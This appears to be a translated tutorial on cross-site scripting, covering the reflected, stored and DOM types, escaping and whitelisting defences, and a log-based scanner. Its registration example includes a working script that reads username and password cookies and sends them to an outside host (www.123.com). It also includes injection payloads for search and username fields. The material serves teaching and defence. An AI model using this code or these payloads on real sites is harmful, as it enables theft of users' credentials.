The Principle of Cross-Site Scripting (XSS) Attacks and Preventive Countermeasures

Source: Internet
Author: User
Tags: html, page, regular expression

Abstract: With the rapid development of computer network technology, network security is receiving more and more attention. Network attacks take many forms; worms, Trojans and other malicious code are implanted into Web pages and pose a great security risk to network users. In an XSS (cross-site scripting) attack, a malicious attacker inserts malicious HTML code into a Web page; when a user browses that page, the embedded HTML code is executed in the user's browser, achieving the attacker's purpose against that user. This paper explains the mechanism and characteristics of XSS, analyzes how Web page code can be checked and the characteristics of Web Trojans, and discusses countermeasures that correspond to those characteristics.

Keywords: Web Trojan; XSS; attack; prevention

I. Preface

A Web Trojan is a new type of malicious code. An attacker places it in a server-side HTML page, and the malicious attack code is propagated when clients access the server; it is implanted mainly through vulnerabilities in the browser and some of its plug-ins. A Web Trojan is a client-side attack method: it can effectively bypass firewall detection, hide malicious code on the client, and download and execute a malicious program without the user's knowledge. It poses a serious security threat to Internet users.

After the appearance of Web 2.0, the harm done by XSS reached a very serious level. Cross-site scripting (Cross Site Script) is abbreviated XSS to distinguish it from cascading style sheets (CSS). In an XSS attack, an intruder inserts malicious data into the HTML code of a remote Web page that the user believes is trustworthy; when the browser downloads the page, the script embedded in it is interpreted and executed. XSS has its own unique characteristics. Many researchers at home and abroad are studying the defense against XSS in depth, while attackers keep using more advanced means to make Trojan attacks more concealed and more successful. The mechanism of XSS and research into preventive countermeasures have therefore become an important subject for computer professionals.

II. The mechanism and characteristics of XSS

1. The origin of XSS

A cross-site scripting (XSS) vulnerability is really an HTML injection problem: the attacker's input is not strictly controlled, enters the database, and is finally displayed to visiting users, so the visiting user's browser executes the HTML code with that user's identity. The data flow is as follows: attacker's HTML input -> Web program -> database -> Web program -> user's browser. At present almost every site provides an in-site or off-site search box in which you can search for anything available on the site. Such a search form looks like this:


Figure 1-1

Figure 1-2

Internal code:

    <form action="search.asp" method="get">
      <input type="text" name="q" value=""/>
      <input type="submit" value="Search"/>
    </form>

The search results are displayed on an ASP Web page, which also echoes the search keywords alongside the results: whatever the user searches for is shown on the page together with the results. Now suppose an attacker tries to inject a malicious script by entering the following HTML code in the search box: "<script>alert('XSS cross-site scripting attack')</script>". The generated code becomes <input type="text" name="q" value=""<script>alert('XSS cross-site scripting attack')</script>/>, so the embedded JavaScript is executed by the browser and an alert box appears with the text "XSS cross-site scripting attack". The user's search cannot be completed. (The two sites shown above already filter for XSS, so the alert box does not appear on them.)

Here is an example of a user registration page. It is of course simplistic and could hardly be used to attack any real website; it only shows how the attack works. Many websites provide user registration: the site's back-end database stores the user name and password so the user can log in next time, and some sites even record the user name and password in clear text. After registering an account and logging in, a malicious user can use simple tools to view the structure and field names of the cookie; if the website has an XSS vulnerability, it is then easy to obtain other users' names and passwords.


Figure 2-1

The user registration page is shown in Figure 2-1. It lets the user fill in registration information, which is then stored in the back-end database. Because the user input is fully trusted, the registration information is written to the database exactly as entered. A malicious user can exploit this to enter HTML and JS code, for example <script type="text/javascript" src="http://www.123.com/h.js"></script>, directly into the "User name" field in order to steal user information.

The content of http://www.123.com/h.js:

    // read the user name and password that the site stored in the cookie
    // (cookieHelper is a helper object the article assumes exists)
    var username = cookieHelper.getCookie('username').value;
    var password = cookieHelper.getCookie('password').value;

    // load a script from the attacker's server with both values in the URL,
    // which sends them off-site
    var script = document.createElement('script');
    script.src = 'http://www.123.com/index.asp?username=' + username + '&password=' + password;
    document.body.appendChild(script);

In this way the user name and password stored in the cookie are easily obtained.

2. Types of cross-site scripting attacks

2.1 Non-persistent cross-site scripting. Non-persistent XSS is also called reflected cross-site scripting and is the most common type of XSS. Here the injected data is reflected straight back by the server in the returned page. Example 1 above is a non-persistent attack. A typical non-persistent XSS attack is delivered as a link that contains the XSS payload.

2.2 Persistent (stored) cross-site scripting. Persistent cross-site scripting is stored cross-site scripting: the XSS payload is saved in the Web site's database and is delivered whenever a user opens the Web page, so the script runs every time the user opens the browser to that page. Persistent XSS is more harmful than non-persistent XSS, because the script executes automatically whenever any user opens the page to view its content. Example 2 above is a persistent cross-site scripting attack.

2.3 DOM-based cross-site scripting. DOM-based XSS is sometimes called "type-0 XSS". Here the XSS payload takes effect by modifying the page in the user's browser through the DOM: the HTTP response from the server is unchanged, but the script executes maliciously on the client.

III. Countermeasures for preventing XSS

The pattern of an XSS attack is very simple: embed your own code in the page so that it executes along with the page. Preventing XSS is also simple in principle. Web site developers should first focus on reliable input validation of everything users submit, including HTML, URLs, query keywords, HTTP headers, POST and GET data, and so on. Accept only the characters you expect, in the appropriate format and within the length you specify, and block, filter or ignore everything else. The processing strategy differs depending on where the user input appears.

1. HTML

Only < and > need to be handled: as long as no HTML tag can be formed, the page is safe. You can use the ASP built-in Replace method, Replace(str, "<", "&lt;") and Replace(str, ">", "&gt;"), on the content to be output so that < and > are escaped.

2. JS

There is no good way to handle user input that will be output into a JS code snippet; escaping just a few characters does not guarantee that every attack is removed. It is therefore generally recommended not to output user-generated content directly into a JS fragment.

If circumstances require that the content be output directly, the following methods are available:

1) If the content to be output has a specific set of possible values or a specific format, it can be checked with a whitelist or a regular expression.

2) The content can be output into a hidden HTML tag or hidden form field, and the JS obtains it by reading the contents of that tag.
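The search form from section II rendered with and without escaping, together with the two options just listed for data that must reach JavaScript, as an added example in JavaScript (not code from the original article). escapeHtml, renderSearchForm, whitelistOrNull, renderHiddenField and the hidden-field id are assumed names, and the payload is constructed after the article's search example.

```javascript
// Added example (not from the original article). Names and the hidden-field
// id are assumptions; the payload below is constructed after the article's example.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// The article escapes only < and >. The reflected value lands inside a quoted
// attribute, so the quotes are escaped too (and & so the escaping stays
// reversible); the value can then neither close the attribute nor open a tag.
function escapeHtml(str) {
  return String(str).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// The article's search form. escape=false reproduces the vulnerable page,
// which concatenates the query straight into the value attribute.
function renderSearchForm(q, escape = true) {
  const value = escape ? escapeHtml(q) : q;
  return '<form action="search.asp" method="get">' +
    '<input type="text" name="q" value="' + value + '"/>' +
    '<input type="submit" value="Search"/></form>';
}

// Option 1 for data that must reach JS: a whitelist. Input that does not match
// the expected format is rejected outright rather than escaped.
function whitelistOrNull(value, pattern) {
  return pattern.test(value) ? value : null;
}

// Option 2: do not build script text from user data at all. Emit the value
// into a hidden field; the page's JS reads document.getElementById(id).value,
// where the browser has already decoded the entities to plain text that is
// never parsed as markup or script.
function renderHiddenField(id, value) {
  return '<input type="hidden" id="' + id + '" value="' + escapeHtml(value) + '"/>';
}

// Constructed payload modelled on the article's search example: the leading
// quote is what closes the value attribute in the vulnerable rendering.
const PAYLOAD = '"<script>alert(\'XSS cross-site scripting attack\')</script>';

// Returns true when the markup contains a script tag the browser would run.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}
```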

3. Check

So how do you check existing pages? Currently there is no good way to check a server completely for pages vulnerable to XSS, but there are ways to find the more obvious omissions. The basic idea is as follows:

1) Extract all unique requests from the Apache access_log, modify one of each request's parameters to "<script>alert('XSS')</script>", and send the request.

2) Get the returned content. If it still contains the same string, the suspicious input was output to the page unprocessed, so the page has a hidden danger and needs to be fixed.

In this way the vast majority of XSS attacks that can be launched through GET requests can be found. Request parameters that do not appear in the access_log are not covered by this check and may be missed; they need to be collected and tested manually. Requests made through POST need to be checked with a different strategy. The idea is as follows: in every form on the site that accepts input, enter a string such as < ' ", and if the page generated after submission contains this string unprocessed, there is a hidden danger.
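The access_log check described in steps 1) and 2), as an added example written in JavaScript for Node (not the article's own code or tool). It assumes Apache combined log format, checks GET requests only, and takes a caller-supplied fetchFn so that the constructed SAMPLE_LOG and stubFetch let it run offline.

```javascript
// Added example (not the article's code): the access_log check from section 3,
// runnable offline. Assumes Apache combined log format and GET requests only.
const MARKER = "<script>alert('XSS')</script>";
// Unique GET paths that carry a query string, taken from the log text.
function uniqueGetRequests(logText) {
  const seen = new Set();
  for (const line of logText.split('\n')) {
    const m = /"GET (\S+\?\S+) HTTP\/[\d.]+"/.exec(line);
    if (m) seen.add(m[1]);
  }
  return [...seen];
}

// One probe URL per parameter, with that parameter replaced by the marker.
function probeVariants(path) {
  const [base, query] = path.split('?');
  return [...new URLSearchParams(query).keys()].map((name) => {
    const p = new URLSearchParams(query);
    p.set(name, MARKER);
    return { param: name, url: base + '?' + p.toString() };
  });
}

// fetchFn(url) resolves to the response body. A body that still contains the
// marker unchanged means the parameter is echoed unescaped and needs fixing.
async function findReflectedParams(logText, fetchFn) {
  const findings = [];
  for (const path of uniqueGetRequests(logText)) {
    for (const v of probeVariants(path)) {
      if ((await fetchFn(v.url)).includes(MARKER)) findings.push({ path, param: v.param });
    }
  }
  return findings;
}

// Constructed sample log: a duplicated search hit, one page hit, one POST.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /search.asp?q=book HTTP/1.1" 200 512',
  '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /page.asp?id=42 HTTP/1.1" 200 1024',
  '10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /search.asp?q=book HTTP/1.1" 200 512',
  '10.0.0.6 - - [01/Jan/2024:10:00:03 +0000] "POST /login.asp HTTP/1.1" 302 0',
].join('\n');

// Constructed stub server: search.asp echoes q raw, page.asp escapes id.
async function stubFetch(url) {
  const u = new URL(url, 'http://localhost');
  if (u.pathname === '/search.asp') return '<input name="q" value="' + u.searchParams.get('q') + '">';
  const id = (u.searchParams.get('id') || '').replace(/</g, '&lt;').replace(/>/g, '&gt;');
  return '<p>id=' + id + '</p>';
}
```

Against a live server, replace stubFetch with a function that issues the HTTP request and resolves to the body; the findings list then names exactly the path and parameter that echo the marker unprocessed.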

The analysis above shows that XSS is a more harmful, harder to guard against and more covert attack method. In fact, once its principles are understood and the countermeasures above are taken into account, XSS vulnerabilities can be eradicated.
